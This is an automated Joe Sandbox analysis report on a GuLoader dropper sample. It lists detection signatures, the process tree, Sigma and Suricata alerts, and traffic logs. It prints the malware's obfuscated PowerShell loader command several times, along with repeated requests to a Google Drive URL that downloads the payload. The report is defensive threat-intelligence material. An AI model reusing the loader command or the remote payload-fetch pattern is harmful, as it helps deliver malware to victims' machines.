Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cpfkf79Rzk.exe

Overview

General Information

Sample name:Cpfkf79Rzk.exe
renamed because original name is a hash value
Original sample name:f973b482345d4ff8ac164868b9f50ce95e47ed2648b57c400ab59f04457c9a4f.exe
Analysis ID:1588341
MD5:c642619ad2a1ac39867c56cb2f889e78
SHA1:a15c485e5dbacdb5776e2cec6c3a1af3c4a400d2
SHA256:f973b482345d4ff8ac164868b9f50ce95e47ed2648b57c400ab59f04457c9a4f
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Cpfkf79Rzk.exe (PID: 3736 cmdline: "C:\Users\user\Desktop\Cpfkf79Rzk.exe" MD5: C642619AD2A1AC39867C56CB2F889E78)
    • powershell.exe (PID: 1428 cmdline: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Kvababbelser58.exe (PID: 5912 cmdline: "C:\Users\user~1\AppData\Local\Temp\Kvababbelser58.exe" MD5: C642619AD2A1AC39867C56CB2F889E78)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2638156664.00000000016FA000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.2070497812.0000000008D1A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Cpfkf79Rzk.exe", ParentImage: C:\Users\user\Desktop\Cpfkf79Rzk.exe, ParentProcessId: 3736, ParentProcessName: Cpfkf79Rzk.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , ProcessId: 1428, ProcessName: powershell.exe
      Sigma detected: Use Short Name Path in Command Line
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Cpfkf79Rzk.exe", ParentImage: C:\Users\user\Desktop\Cpfkf79Rzk.exe, ParentProcessId: 3736, ParentProcessName: Cpfkf79Rzk.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , ProcessId: 1428, ProcessName: powershell.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Cpfkf79Rzk.exe", ParentImage: C:\Users\user\Desktop\Cpfkf79Rzk.exe, ParentProcessId: 3736, ParentProcessName: Cpfkf79Rzk.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , ProcessId: 1428, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T00:50:00.500769+010028032702Potentially Bad Traffic192.168.2.749969216.58.206.46443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeReversingLabs: Detection: 55%
      Multi AV Scanner detection for submitted file
      Source: Cpfkf79Rzk.exeReversingLabs: Detection: 55%
      Source: Cpfkf79Rzk.exeVirustotal: Detection: 70%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: Cpfkf79Rzk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49970 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49977 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49991 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50003 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50005 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50009 version: TLS 1.2
      Source: Cpfkf79Rzk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: on.pdb source: powershell.exe, 00000002.00000002.2059540466.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2064199965.0000000007121000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49969 -> 216.58.206.46:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
